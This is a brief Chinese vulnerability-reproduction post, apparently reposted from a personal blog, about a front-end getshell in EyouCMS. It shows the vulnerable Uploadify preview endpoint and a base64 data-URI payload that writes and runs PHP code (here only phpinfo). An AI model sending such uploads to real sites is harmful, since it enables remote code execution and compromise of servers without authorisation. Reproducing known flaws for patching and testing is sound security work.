eyoucms 前台 getshell 复现

漏洞地址:http://www.sch01ar.com/index.php/api/Uploadify/preview

eyoucms 前台 getshell 复现_第1张图片

这样子说明存在漏洞

eyoucms 前台 getshell 复现_第2张图片

构造:

data:image/php;base64,PD9waHAgcGhwaW5mbygpOyA=

通过 post 方式发生数据

eyoucms 前台 getshell 复现_第3张图片

返回了结果地址,访问一下

eyoucms 前台 getshell 复现_第4张图片

成功

转载于:https://www.cnblogs.com/sch01ar/p/9565622.html

你可能感兴趣的:(eyoucms 前台 getshell 复现)